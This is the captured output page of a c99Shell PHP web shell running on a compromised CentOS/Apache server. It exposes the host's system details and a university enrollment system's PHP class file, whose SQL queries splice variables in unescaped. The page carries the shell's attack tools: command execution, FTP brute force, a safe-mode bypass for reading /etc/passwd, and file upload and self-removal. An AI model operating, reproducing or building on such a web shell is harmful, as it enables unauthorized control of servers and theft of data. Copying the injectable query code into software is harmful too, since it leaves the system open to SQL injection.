110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/class/ drwxr-xr-x Free 52.6 GB of 127.8 GB (41.15%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/class/ drwxr-xr-x
Free 52.6 GB of 127.8 GB (41.15%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: clsClass.php (12.95 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

SetQuery("select * from Class order by classId limit $start, $pageSize");
}

function RSClassByPgIdIsNullAndAcYAndSe($xKey, $yKey){
	$this->SetQuery("select * from Class where programId is null and acadYear='$xKey' and semester='$yKey'");
}

function RSClassByPgIdAndPgIdIsNullOrderAcYAndStYAndSe($xKey){
	$this->SetQuery("select * from Class where section='1' and (programId='$xKey' or programId is null) order by acadYear, studentYear, semester");
}

function RSClassByPgIdAndAcYAndStYAndSeAndCoIdAndEmpty($pgId, $acY, $stY, $se, $coId){
	$this->SetQuery("select * from Class 
						where programId='$pgId' and acadYear='$acY' and studentYear='$stY' 
						and semester='$se' and courseId='$coId' and enrollSeatSetQuery("select c.* from Class c, ClassOpenFor f 
						where c.programId is null and c.acadYear='$acY' and c.studentYear='$stY' 
						and c.semester='$se' and c.courseId='$coId' and c.enrollSeatSetQuery("select * from Class where programId='$wKey' and studentYear='$xKey' and semester='$yKey' and acadYear='$zKey'");
}

function RSClassByPgIdAndStYAndSeAndAcYNULL($wKey, $xKey, $yKey, $zKey){
	$this->SetQuery("select * from Class where programId is null and studentYear='$xKey' and semester='$yKey' and acadYear='$zKey'");
}

function RSClassByPgIdAndStYAndSeAndAcYAndCdIdAndSection($vKey, $wKey, $xKey, $yKey, $zKey){
	$this->SetQuery("select * from Class where programId='$vKey' and studentYear='$wKey' and semester='$xKey' and acadYear='$yKey' and conditionId='$zKey' and section='1'");
}

function RSClassByPgIdAndStYAndSeAndAcYAndEmpty($wKey, $xKey, $yKey, $zKey){
	$this->SetQuery("select * from Class where programId='$wKey' and studentYear='$xKey' and semester='$yKey' and acadYear='$zKey' and enrollSeatSetQuery("select c.courseId, c.conditionId2, min(c.classId) as classId 
						from Class c, ClassOpenFor f 
						where c.programId is null and c.acadYear='$acY' and c.studentYear='$stY' 
						and c.semester='$se' and c.conditionId='$cdId' and c.classId=f.classId 
						and f.programId='$pgId' group by c.courseId, c.conditionId2");
}

function RSClassByStYAndSeAndAcYAndPgIdIsNullAndEmpty($xKey, $yKey, $zKey){
	$this->SetQuery("select * from Class where studentYear='$xKey' and semester='$yKey' and acadYear='$zKey' and programId is null and enrollSeatSetQuery($sql);
}

function RSClassByClIdAndEmpty($xKey){
	$this->SetQuery("select * from Class where classId='$xKey' and enrollSeatSetQuery("select c.* from Class c, ClassOpenFor f 
						where c.programId is null and c.classId='$clId' and c.enrollSeatSetQuery("select * from Class where acadYear='$wKey' and studentYear='$xKey' and semester='$yKey' and courseId='$zKey' and section='1'");
}

function RSClassByAcYAndStYAndSeAndCoIdAndNoPgId($wKey, $xKey, $yKey, $zKey){
	$this->SetQuery("select * from Class where acadYear='$wKey' and studentYear='$xKey' and semester='$yKey' and courseId='$zKey'");
}

function RSClassByPgIdIsNullAndAcYAndStYAndSeAndCoId($wKey, $xKey, $yKey, $zKey){
	$this->SetQuery("select * from Class where programId is null and acadYear='$wKey' and studentYear='$xKey' and semester='$yKey' and courseId='$zKey'");
}

function RSClassByPgIdIsNullAndAcYAndStYAndSeOpenFor($acY, $stY, $se, $pgId){
	$this->SetQuery("select c.* from Class c, ClassOpenFor f 
						where c.programId is null and c.acadYear='$acY' and c.studentYear='$stY' 
						and c.semester='$se' and c.classId=f.classId and f.programId='$pgId'");
}

function RSClassByPgIdIsNullAndAcYAndStYAndSeAndCoIdOpenFor($acY, $stY, $se, $coId, $pgId){
	$this->SetQuery("select c.* from Class c, ClassOpenFor f 
						where c.programId is null and c.acadYear='$acY' and c.studentYear='$stY' 
						and c.semester='$se' and c.courseId='$coId' and c.classId=f.classId 
						and f.programId='$pgId' order by c.section");
}

function RSClassByRealSPId($xKey){
	$this->SetQuery("select * from Class where realStudyPlanId='$xKey'");
}

function RSClassByPgIdAndCoId($xKey, $yKey){
	$this->SetQuery("select courseId from Class where programId='$xKey' and courseId='$yKey' order by classId");
}

function SearchByKeyPgIdAndCoIdAndStudy($pgId, $coId, $stY, $se, $acY){
	if($this->SetQuery("select * from Class where programId='$pgId' and acadYear='$acY' and studentYear='$stY' and semester='$se' and courseId='$coId' order by classId")){
		return 1;
	}else {
		return 0;
	}
}

function RSClassMaxSection($xKey, $yKey, $zKey, $sKey, $aKey){
	$this->SetQuery("select max(section) as num from Class where programId='$xKey' and courseId='$yKey' and studentYear='$zKey' and semester='$sKey' and acadYear='$aKey' order by classId");
	$result=$this->GetResult();
	return $result['num'];	
}

function RSClassMaxSectionNULL($xKey, $yKey, $zKey, $sKey, $aKey){
	$this->SetQuery("select max(section) as num from Class where programId is null and courseId='$yKey' and studentYear='$zKey' and semester='$sKey' and acadYear='$aKey' order by classId");
	$result=$this->GetResult();
	return $result['num'];	
}

function RSClassSumTotalSeat($xKey, $yKey, $zKey, $sKey, $aKey, $StY){
	$this->SetQuery("select sum(totalSeat) as num from Class where programId='$xKey' and courseId='$yKey' and studentYear='$zKey' and semester='$sKey' and acadYear='$aKey' and studentYear='$StY' order by classId");
	$result=$this->GetResult();
	return $result['num'];
}

function RSClassSumTotalSeatNULL($xKey, $yKey, $zKey, $sKey, $aKey, $StY){
	$this->SetQuery("select sum(totalSeat) as num from Class where programId is null and courseId='$yKey' and studentYear='$zKey' and semester='$sKey' and acadYear='$aKey' and studentYear='$StY' order by classId");
	$result=$this->GetResult();
	return $result['num'];
}

function RSClassByCourseId($cKey){
	$this->SetQuery("select * from Class where courseId='$cKey' and sendGradeStatus='N' order by classId");
}

function RSClassByCourseIdY($cKey){
	$this->SetQuery("select * from Class where courseId='$cKey' and sendGradeStatus='Y' order by classId");
}

function RSClassByCoIdAndAcYSeM($xKey, $yKey, $zKey){
	$this->SetQuery("select * from Class where courseId='$xKey' and acadYear='$yKey' and semester='$zKey'");
}

function RSClassByCoCodeAndAcYAndSeAndSection($wKey, $xKey, $yKey, $zKey){
	$this->SetQuery("select * from Class cl, Course co 
						where co.courseCode like '%$wKey%' and co.courseId=cl.courseId 
						and cl.acadYear='$xKey' and cl.semester='$yKey' and cl.section='$zKey' 
						order by cl.programId, co.courseCode, co.courseName");
}

function GetSumCrAtByPgIdAndAcYAndSeAndAdY($pgId, $acY, $se, $adY){
	$sql = "select sum(e.creditAttempt) as num from Class c, EnrollItem e, StudentMaster s 
				where c.programId='$pgId' and c.acadYear='$acY' and c.semester='$se' 
				and c.classId=e.classId and e.studentId=s.studentId and c.programId=s.programId 
				and s.admitAcadYear='$adY'";
	$this->SetQuery($sql);
    if ($result=$this->GetResult()) {
        return $result['num'];
    }
}

function GetSumCrAtByPgIdIsNullAndAcYAndSeAndAdYOpenFor($pgId, $acY, $se, $adY){
	$sql = "select sum(e.creditAttempt) as num from Class c, ClassOpenFor f, EnrollItem e, StudentMaster s 
				where c.programId is null and c.acadYear='$acY' and c.semester='$se' 
				and c.classId=f.classId and f.programId='$pgId' 
				and c.classId=e.classId and e.studentId=s.studentId and f.programId=s.programId 
				and s.admitAcadYear='$adY'";
	$this->SetQuery($sql);
    if ($result=$this->GetResult()) {
        return $result['num'];
    }
}

function GetSumCrAtByPgIdAndAcYAndAdY($pgId, $acY, $adY){
	$sql = "select sum(e.creditAttempt) as num from Class c, EnrollItem e, StudentMaster s 
				where c.programId='$pgId' and c.acadYear='$acY' 
				and c.classId=e.classId and e.studentId=s.studentId and c.programId=s.programId and s.admitAcadYear='$adY'";
	$this->SetQuery($sql);
    if ($result=$this->GetResult()) {
        return $result['num'];
    }
}

function GetSumCrAtByPgIdIsNullAndAcYAndAdYOpenFor($pgId, $acY, $adY){
	$sql = "select sum(e.creditAttempt) as num from Class c, ClassOpenFor f, EnrollItem e, StudentMaster s 
				where c.programId is null and c.acadYear='$acY' 
				and c.classId=f.classId and f.programId='$pgId' 
				and c.classId=e.classId and e.studentId=s.studentId and f.programId=s.programId and s.admitAcadYear='$adY'";
	$this->SetQuery($sql);
    if ($result=$this->GetResult()) {
        return $result['num'];
    }
}

function RSClassByAcYAndSeAndDayGroupPgId($acY, $se, $wDay){
	$sql = "select c.programId from Class c, ClassTimeTable t 
				where c.acadYear='$acY' and c.semester='$se' and c.classId=t.classId and t.weekDay='$wDay' 
				group by c.programId 
			union 
			select f.programId from Class c, ClassTimeTable t, ClassOpenFor f 
				where c.acadYear='$acY' and c.semester='$se' and c.classId=t.classId and t.weekDay='$wDay' 
				and c.classId=f.classId group by f.programId";
	$this->SetQuery($sql);
}

function RSClassByPgIdAndAcYAndSeAndDayGroupStY($pgId, $acY, $se, $wDay){
	$sql = "select c.studentYear from Class c, ClassTimeTable t 
				where c.programId='$pgId' and c.acadYear='$acY' and c.semester='$se' and c.classId=t.classId 
				and t.weekDay='$wDay' group by c.studentYear 
			union 
			select c.studentYear from Class c, ClassTimeTable t, ClassOpenFor f 
				where c.programId is null and c.acadYear='$acY' and c.semester='$se' and c.classId=t.classId 
				and t.weekDay='$wDay' and c.classId=f.classId and f.programId='$pgId' group by c.studentYear";
	$this->SetQuery($sql);
}

function RSClassByPgIdAndAcYAndStYAndSeAndDayAndBetweenPr($pgId, $acY, $stY, $se, $wDay, $pr){
	$sql = "select c.* from Class c, ClassTimeTable t 
				where c.programId='$pgId' and c.acadYear='$acY' and c.studentYear='$stY' and c.semester='$se' 
				and c.classId=t.classId and t.weekDay='$wDay' and '$pr' between t.timeSlotStart and t.timeSlotEnd 
			union 
			select c.* from Class c, ClassTimeTable t, ClassOpenFor f 
				where c.programId is null and c.acadYear='$acY' and c.studentYear='$stY' and c.semester='$se' 
				and c.classId=t.classId and t.weekDay='$wDay' and '$pr' between t.timeSlotStart and t.timeSlotEnd 
				and c.classId=f.classId and f.programId='$pgId'";
	$this->SetQuery($sql);
}

function RSClassByPgIdAndAcYAndStYGroupSe($pgId, $acY, $stY){
	$sql = "select c.semester from Class c 
				where c.programId='$pgId' and c.acadYear='$acY' and c.studentYear='$stY' 
				group by c.semester 
			union 
			select c.semester from Class c, ClassOpenFor f 
				where c.programId is null and c.acadYear='$acY' and c.studentYear='$stY' 
				and c.classId=f.classId and f.programId='$pgId' 
				group by c.semester";
	$this->SetQuery($sql);
}

function RSClassByPgIdAndAcYAndStYAndSeAndErSeat($pgId, $acY, $stY, $se){
	$sql = "select c.courseId from Class c 
				where c.programId='$pgId' and c.acadYear='$acY' and c.studentYear='$stY' 
				and c.semester='$se' and c.enrollSeat>0 
				group by c.courseId 
			union 
			select c.courseId from Class c, ClassOpenFor f 
				where c.programId is null and c.acadYear='$acY' and c.studentYear='$stY' 
				and c.semester='$se' and c.enrollSeat>0 
				and c.classId=f.classId and f.programId='$pgId' 
				group by c.courseId";
	$this->SetQuery($sql);
}

function RSClassByPgIdAndAcYAndStYAndSeAndShowLabTS($pgId, $acY, $stY, $se){
	$sql = "select cl.* from Class cl, Course co 
				where cl.programId='$pgId' and cl.acadYear='$acY' and cl.studentYear='$stY' and cl.semester='$se' 
				and cl.courseId=co.courseId and co.showLabTS='Y' 
			union 
			select cl.* from Class cl, Course co, ClassOpenFor f 
				where cl.programId is null and cl.acadYear='$acY' and cl.studentYear='$stY' and cl.semester='$se' 
				and cl.classId=f.classId and f.programId='$pgId' 
				and cl.courseId=co.courseId and co.showLabTS='Y'";
	$this->SetQuery($sql);
}

function RSClassByPgIdAndAcYAndStYAndSeAndCoCodeAndCoNameAndCoNameE($pgId, $acY, $stY, $se, $coCode, $coName, $coNameE){
	$sql = "select cl.* from Class cl, Course co 
			where cl.courseId=co.courseId".$pgId.$acY.$stY.$se." and co.courseCode like '%$coCode%' 
			and co.courseName like '%$coName%' and co.courseNameEng like '%$coNameE%'";
	$this->SetQuery($sql);
}

} //--End class Class1--
?>
bool(false)

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0055 ]--